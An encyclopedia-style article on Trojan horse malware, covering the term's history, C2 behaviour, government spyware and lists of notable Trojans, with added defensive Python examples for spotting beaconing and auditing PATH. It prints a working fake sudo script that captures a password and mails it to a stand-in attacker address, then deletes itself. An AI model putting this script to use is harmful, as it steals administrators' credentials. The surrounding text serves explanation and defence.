Trojan horse (computing)
In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans generally spread by some form of social engineering; for example, a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking on a fake advertisement on social media or elsewhere. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then gain unauthorized access to the affected computer. Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.


Use of the term

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual already assumed its readers knew both. Another early reference is a 1974 US Air Force report on the analysis of vulnerability in the Multics computer systems. The term was popularized by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: ''To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.'' He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.


Behavior

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more command-and-control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action.

In German-speaking countries, spyware used or made by the government is sometimes called ''govware''. Govware is typically Trojan software used to intercept communications from the target computer. Some countries, such as Switzerland and Germany, have a legal framework governing the use of such software (Basil Cupa, "Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)", LISS 2013, pp. 419–428). Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it is encrypted by other applications.

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.
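The C2 behaviour described at the start of this section (a Trojan polling the same controller on a fixed port at a steady cadence) is what network defenders look for when they say such traffic is "relatively simple to detect". The following is an added example, not code from the original page: a small beacon detector run over a constructed connection log. The log format, the addresses, the port 4444 and the list of "common" ports are all assumptions made for this example; the detection idea (low inter-arrival jitter to one destination, on a port the host does not normally use) is the general one.

```python
"""Added example (not from the original page): flag Trojan-style C2
beaconing in connection logs.  The log format, hosts and ports below are
constructed for this example."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log, one connection per line:
#   "<epoch seconds> <src> <dst> <dst port>"
# 10.0.0.5 talks to 203.0.113.7:4444 exactly every 60 s (a beacon); the
# remaining flows are ordinary web traffic with irregular timing.
SAMPLE_LOG = """\
1700000000 10.0.0.5 203.0.113.7 4444
1700000003 10.0.0.5 198.51.100.10 443
1700000060 10.0.0.5 203.0.113.7 4444
1700000091 10.0.0.8 198.51.100.10 443
1700000120 10.0.0.5 203.0.113.7 4444
1700000133 10.0.0.5 198.51.100.20 443
1700000180 10.0.0.5 203.0.113.7 4444
1700000199 10.0.0.8 198.51.100.10 80
1700000240 10.0.0.5 203.0.113.7 4444
1700000247 10.0.0.5 198.51.100.10 443
"""

# Assumed set of ports a workstation contacts all day anyway.  A steady
# cadence to one host on any other port is the pattern worth a look.
COMMON_PORTS = {80, 443, 53, 123}


def parse_log(text):
    """Group timestamps by (src, dst, dport) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(int(ts))
    return flows


def beacon_score(timestamps):
    """Return (mean interval, coefficient of variation) for a flow with at
    least four connections, or None when there is too little data."""
    if len(timestamps) < 4:
        return None
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return None
    return avg, pstdev(gaps) / avg


def find_beacons(text, max_cv=0.2):
    """Flows whose inter-arrival jitter (coefficient of variation) is at or
    below max_cv.  A destination port outside COMMON_PORTS upgrades the
    verdict from 'regular' (could be a legitimate poller) to 'suspect'."""
    findings = []
    for (src, dst, dport), stamps in parse_log(text).items():
        score = beacon_score(stamps)
        if score is None:
            continue
        avg, cv = score
        if cv <= max_cv:
            findings.append({
                "src": src, "dst": dst, "dport": dport,
                "hits": len(stamps),
                "period_s": round(avg, 1),
                "jitter": round(cv, 3),
                "verdict": "suspect" if dport not in COMMON_PORTS else "regular",
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Real Trojans add jitter and sleep longer between check-ins, so in practice the threshold and the minimum hit count are tuned per environment, and a "regular" verdict on port 443 still deserves a look at the destination's reputation; the point of the example is that the fixed-port, fixed-period habit the text describes is a cheap signal to compute from flow logs alone.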


Linux example

A ''Trojan horse'' is a program that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy example is a fake version of the Linux sudo command. The fake is copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory with "." on their PATH and executes sudo, then the ''Trojan horse'' is executed instead of the real command. Here is a working version:

    #!/bin/sh
    # sudo
    # ----
    # Turn off the character echo to the screen.
    stty -echo
    /bin/echo -n "Password for `whoami`: "
    read x
    /bin/echo ""
    # Turn back on the character echo.
    stty echo
    # Mail the captured password to the attacker, then pretend the
    # authentication failed and remove the evidence.
    echo $x | mail -s "`whoami` password" outside@creep.com
    sleep 1
    echo Sorry.
    rm $0
    exit 0

To prevent a command-line based ''Trojan horse'' of this kind, place the "." entry at the tail end of the PATH environment variable, or better, omit it entirely. For example:

    PATH=/usr/local/bin:/usr/bin:.

Even at the tail end, "." still lets a planted file be run for any command name that is mistyped or not installed, and an empty PATH entry (a leading, trailing or doubled colon) is searched as the current directory just like "."; leaving both out removes the risk.
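The PATH advice above is easy to get subtly wrong: "." is not the only way the current directory ends up on the search path, and a world-writable directory such as /tmp on PATH is as bad as "." because anyone can drop a fake sudo there. The following is an added example, not code from the original page: a small audit of a PATH string that reports the entries a Trojan like the one above could exploit. The function name audit_path and the wording of the findings are this example's own choices.

```python
"""Added example (not from the original page): audit a PATH string for
entries that let a planted command shadow the real one.  The helper name
and the finding texts are this example's own choices."""
import os
import stat


def audit_path(path_value):
    """Return a list of (entry, problem) pairs; an empty list means clean.

    Problems flagged:
      - empty entries: a leading, trailing or doubled ':' is searched as
        the current directory, exactly like '.'
      - relative entries such as '.' or 'bin', resolved from wherever the
        administrator happens to be standing
      - world-writable directories (the /tmp case from the example above);
        the sticky bit does not help, since the attacker owns the file
    """
    findings = []
    for entry in path_value.split(":"):
        if entry == "":
            findings.append((entry, "empty entry: searched as current directory"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry: searched from current directory"))
        else:
            try:
                mode = os.stat(entry).st_mode
            except FileNotFoundError:
                # Nothing to stat today; note that a missing entry under a
                # writable parent could still be created by an attacker.
                continue
            if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
                findings.append((entry, "world-writable directory"))
    return findings


if __name__ == "__main__":
    # Audit the live environment of whoever runs this.
    for entry, problem in audit_path(os.environ.get("PATH", "")):
        print(f"{problem}: {entry!r}")
```

Run it against the PATH of every account that can reach sudo, not just root: the sudo Trojan in the text captures the password of whichever user types the command, and it is the administrator's ordinary shell PATH that decides whether the fake in /tmp wins.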


Notable examples


Private and governmental

* ANOM – FBI
* 0zapftis / r2d2 StaatsTrojaner – DigiTask
* DarkComet – CIA / NSA
* FinFisher – Lench IT solutions / Gamma International
* DaVinci / Galileo RCS – HackingTeam
* Magic Lantern – FBI
* SUNBURST – SVR/Cozy Bear (suspected)
* TAO QUANTUM/FOXACID – NSA
* WARRIOR PRIDE – GCHQ


Publicly available

* EGABTR – late 1980s
* Netbus – 1998 (published)
* Sub7 by Mobman – 1999 (published)
* Back Orifice – 1998 (published)
* Beast – 2002 (published)
* Bifrost Trojan – 2004 (published)
* DarkComet – 2008-2012 (published)
* Blackhole exploit kit – 2012 (published)
* Gh0st RAT – 2009 (published)
* MegaPanzer BundesTrojaner – 2009 (published)
* MEMZ by Leurak – 2016 (published)


Detected by security researchers

* Twelve Tricks – 1990
* Clickbot.A – 2006 (discovered)
* Zeus – 2007 (discovered)
* Flashback Trojan – 2011 (discovered)
* ZeroAccess – 2011 (discovered)
* Koobface – 2008 (discovered)
* Vundo – 2009 (discovered)
* Coreflood – 2010 (discovered)
* Tiny Banker Trojan – 2012 (discovered)
* SOVA – 2022 (discovered)
* Shedun Android malware – 2015 (discovered)


Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.


See also

* Computer security
* ''Cuckoo's egg'' (metaphor)
* Cyber spying
* Dancing pigs
* Exploit (computer security)
* Industrial espionage
* Phishing
* Principle of least privilege
* Privacy-invasive software
* Remote administration
* Remote administration software
* Reverse connection
* Rogue security software
* Scammers
* Technical support scam
* Timeline of computer viruses and worms
* Zombie (computer science)

